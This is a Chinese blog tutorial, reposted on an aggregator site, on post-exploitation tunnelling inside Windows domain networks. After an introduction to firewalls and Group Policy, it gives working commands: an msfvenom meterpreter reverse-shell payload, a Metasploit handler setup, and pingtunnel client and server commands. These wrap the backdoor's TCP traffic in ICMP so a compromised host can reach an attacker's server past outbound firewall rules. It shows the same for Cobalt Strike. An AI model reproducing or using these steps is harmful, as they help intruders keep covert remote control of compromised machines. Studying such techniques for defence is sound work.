内网安全:初探隧道技术

这篇具有很好参考价值的文章主要介绍了内网安全:初探隧道技术。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

防火墙必备知识

域控-防火墙组策略对象同步

域控 - 防火墙组策略不出网上线

MSF上线

CS - ICMP上线

注意:隧道技术是后渗透手段,是在已经取得权限后的手段

域控-组策略同步


内网安全:初探隧道技术

防火墙必备知识

学习防火墙的目标是知道了解防火墙的一些常见配置对内网渗透的影响,并不需要像运维一样全面了解防火墙

参考资料:Windows防火墙限制端口/IP/应用访问的方法以及例外的配置

这是阿里云关于windows运维的文档,里面有常见的winodws防火墙配置 

防火墙(Firewall)是一种网络安全设备或软件,用于监控和控制网络流量,以保护计算机和网络免受未经授权的访问、恶意攻击和网络威胁。防火墙通过建立规则和过滤器来管理进出网络的数据流,以确保只有授权的数据能够通过。

防火墙的主要功能包括:

  1. 包过滤:防火墙检查传入和传出网络的数据包,并根据预定义的规则集来决定是否允许通过。这些规则基于源IP地址、目标IP地址、端口号、协议类型等来过滤数据包。
  2. 状态检测:防火墙可以追踪网络连接的状态,并仅允许与已建立连接相关的响应数据包通过。这有助于防止未经授权的外部主机访问内部网络。
  3. 网络地址转换(NAT):防火墙可以执行网络地址转换,将内部私有IP地址转换为公共IP地址,以增强网络安全和隐私。
  4. 应用程序过滤:一些高级防火墙还可以检查数据包中的应用层信息,例如应用程序协议、有效载荷内容等,以便更精确地控制应用程序级别的访问和流量。
  5. 虚拟专用网络(VPN)支持:一些防火墙具有VPN功能,可以提供安全的远程访问和加密通信,使远程用户能够安全地连接到内部网络。

通过配置适当的防火墙规则和策略,可以有效保护计算机和网络免受来自互联网和其他网络的潜在威胁。防火墙通常被广泛用于企业网络和个人计算机,作为网络安全的重要组成部分。

关于出站,入站规则:这个出站,入站是针对服务而言的。对于一个Web站点,配置入站规则就是检测访问我们的流量,出站规则就是检测本机出去的流量。

防火墙根据用户不同网络环境有不同的防火墙。比如:

  1. 主机在域内的规则配置
  2. 主机对某个目标的规则配置
  3. 主机对公网的规则配置

在生活中,我们可以运行某个执行程序,系统会提示我们是否允许该应用访问公网网络。

内网安全:初探隧道技术

还可以根据具体的协议,端口进行规则设置

内网安全:初探隧道技术

 还可以针对具体的协议进行出入站限制

内网安全:初探隧道技术


有些破解软件的重要一步就是防止软件与外部网络进行连接,就会将该程序的出入站规则全部禁用。

域控-防火墙组策略对象同步

在域中,可以通过组策略对域内所有设备进行配置防火墙规则

新建一个策略进行编辑

内网安全:初探隧道技术

 这下图进行配置

内网安全:初探隧道技术

配置规则

内网安全:初探隧道技术

强制执行

内网安全:初探隧道技术

域内服务器也可使用命令更新:

gpupdate/force

内网安全:初探隧道技术

内网安全:初探隧道技术

域成员强制同步DC域防火墙策略

域控 - 防火墙组策略不出网上线

背景介绍:域控通过组策略设置防火墙规则同步后,域内用户主机被限制TCP出网,其中规则为出站规则

你可以Ping通百度,但无法访问百度网页。两个协议不一样!

思路:正向连接&隧道技术
如果是入站被限制呢?反向连接&隧道技术也可以解决

这里将会以ICMP协议为例,ICMP协议是Ping命令走的协议

项目地址:

https://github.com/esrrhs/spp
https://github.com/bdamele/icmpsh
https://github.com/esrrhs/pingtunnel

这里我们实验是模拟DC禁用域成员主机TCP

内网安全:初探隧道技术

实战中,TCP封杀的策略:

主机出站TCP封杀 入站无法链接外网

  • 采用正向连接:取得一台有网络的能和主机通讯的服务器权限(能连外网)
  • 把数据给能出网的机器,通过这台机器进行正向链接控制它

主机出站TCP封杀 入站可以链接外网

  • 采用正向连接
  • 或者隧道技术:走其它协议出网

这里的实验是把TCP的数据封装到ICMP协议里带出来。因为目标ICMP未被禁止。ICMP隧道技术,在目标服务器中开启脚本负责将后门的TCP流量转入到ICMP协议中,kali中开启脚本负责监听和接受信息

隧道技术对比代理技术:

隧道技术:解决不出网协议上线的问题,利用可出网协议封装

代理技术:解决网络通讯不通的问题,利用跳板机建立节点

这两种操作是已经取得该目标的system权限后,为了把权限移交出来而使用的,实现持久化控制。

MSF上线

MSF生成后门:

注意这里是127.0.0.1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4455 -f exe > msf.exe

将TCP的流量发送到自己的4455端口

MSF启动监听:

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 4444
exploit 

启动工具,它的作用是把发送ICMP流量还原位TCP流量再被MSF接收 

./pingtunnel -type server     需要在目标主机上执行 需要高权限

内网安全:初探隧道技术

目标机器上启动工具,执行下面命令:

pingtunnel.exe -type client -l 127.0.0.1:4455 -s 47.94.xx.xx -t 47.94.xx.xx:4444 -tcp 1 -noprint 1 -nolog 1

它可以把本地3333端口接收的TCP流量封装到ICMP协议里面,转发个MSF所在主机。

内网安全:初探隧道技术

上线!!!

CS - ICMP上线

配置第一个监听器:

内网安全:初探隧道技术

使用这个监听器生成后门

内网安全:初探隧道技术

这个后门设置的原因和上面MSF是一样的,不再赘述。

生成第一个监听器

内网安全:初探隧道技术

 用来接收反弹

攻击机上运行:

./pingtunnel -type server

被攻击机上运行:

pingtunnel.exe -type client -l 127.0.0.1:6666 -s 192.168.46.66 -t 192.168.46.66:7777 -tcp 1 -noprint 1 -nolog 1

之后会在第二个监听器上接收到连接

内网安全:初探隧道技术

注意:隧道技术是后渗透手段,是在已经取得权限后的手段

域控-组策略同步

域控进行了设置,所有的域内机器都要受到影响,委派下发

软件安装,密码更改等等

内网安全:初探隧道技术

比如:给域内主机设置同一壁纸

内网安全:初探隧道技术

壁纸所在目录设置共享

内网安全:初探隧道技术

域内主机都能看到

内网安全:初探隧道技术

完成设置,查看效果:

内网安全:初探隧道技术文章来源地址https://www.toymoban.com/news/detail-467646.html

到了这里,关于内网安全:初探隧道技术的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Linux系统安全:安全技术和防火墙

    入侵检测系统(Intrusion Detection Systems): 特点是不阻断任何网络访问,量化、定位来自内外网络的威胁情况,主要以提供报警和事后监督为主,提供有针对性的指导措施和安全决策依据,类似于监控系统,一般采用旁路部署的方式。 以透明模式工作,分析数据包的内容如: 溢出攻击

    2024年02月02日
    浏览(28)
  • Linux系统安全:安全技术 和 防火墙 (一)

    入侵检测系统(Intrusion Detection Systems):特点是不阻断任何网络访问,量化、定位来自内外网络的威胁情况,主要以提供报警和事后监督为主,提供有针对性的指导措施和安全决策依据,类 似于监控系统一般采用旁路部署(默默的看着你)方式。 入侵防御系统(Intrusion Preve

    2024年02月20日
    浏览(30)
  • 防火墙技术之安全区域

    安全区域(Security Zone),简称为区域(Zone)。安全区域是一个或多个接口的集合,防火墙通过安全区域来划分网络、标识报文流动的“路线”。一般来说,当报文在不同的安全区域之间流动时才会受到控制。 默认情况下,报文在不同的安全区域之间流动时受到控制,报文在

    2024年02月01日
    浏览(27)
  • 【网络安全】2.1 防火墙技术

    防火墙是网络安全防御的重要组成部分,它的主要任务是阻止或限制不安全的网络通信。在这篇文章中,我们将详细介绍防火墙的工作原理,类型以及如何配置和使用防火墙。我们将尽可能使用简单的语言和实例,以便于初学者理解。 防火墙是一种设备或一套软件,它位于你

    2024年02月08日
    浏览(30)
  • 信息安全:防火墙技术原理与应用.

    防火墙是网络安全区域边界保护的重要技术。为了应对网络威胁,联网的机构或公司将自己的网络与公共的不可信任的网络进行隔离,其方法是根据网络的安全信任程度和需要保护的对象,人为地划分若干安全区域,这些安全区域有:公共外部网络;内联网;外联网(内联网

    2024年02月12日
    浏览(28)
  • 信息安全-防火墙技术原理与应用

    为了应对网络威胁,联网的 机构或公司 将自己的网络与公共的不可信任的网络进行隔离 方法: 根据 网络的安全信任程度 和 需要保护的对象 , 人为划分 若干安全区域,包括: 公共外部网络 ,如Internet(外网) 内联网 (Intranet) ,如某个公司或组织的专用网络,网络访问限制

    2024年02月04日
    浏览(37)
  • linux iptables安全技术与防火墙

    一、入侵检测系统 二、防火墙 1.特点 2.防火墙分类 3.按实现方式划分 4.按网络协议划分 5.Netfilter 6.iptables 三、防水墙 四、tcpdump抓包 五、实验演示 1.SNAT                            是不阻断任何网络访问,量化、定位来自内外网络的威胁情况, 主要以提供报警和事后监督

    2024年02月08日
    浏览(30)
  • 华为防火墙SSL VPN隧道连接实验配置

    用于远程访问VPN,工作在应用层与传输层之间 SSL VPN是以SSL协议为安全基础的VPN远程接入技术,移动办公人员(在SSL VPN中被称为远程用户)使用SSL VPN可以安全、方便的接入企业内网,访问企业内网资源,提高工作效率。 SSL与IPSec、L2TP的区别: 1.IPSec、L2TP缺点:远程用户终端

    2024年02月12日
    浏览(33)
  • 《计算机系统与网络安全》 第十章 防火墙技术

    🌷🍁 博主 libin9iOak带您 Go to New World.✨🍁 🦄 个人主页——libin9iOak的博客🎐 🐳 《面试题大全》 文章图文并茂🦕生动形象🦖简单易学!欢迎大家来踩踩~🌺 🌊 《IDEA开发秘籍》学会IDEA常用操作,工作效率翻倍~💐 🪁🍁 希望本文能够给您带来一定的帮助🌸文章粗浅,敬

    2024年02月11日
    浏览(34)
  • 思科ASA防火墙:内网telnet远程控制防火墙 && 外网ssh远程控制防火墙

    现在他们相互都可以通信 全局通信 1.内网telnet连接ASA 进入asa防火墙全局模式 telnet 192.168.1.1 255.255.255.0 in telnet + 指定远程ip + 子网掩码 +接口名称in=e0/1 如果想让全部都可以连接 telnet 0.0.0.0 0.0.0.0 in passwd 123  设置连接密码 pass + 自定义密码     2.外网ssh远程连接asa防火墙 进入

    2023年04月11日
    浏览(37)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包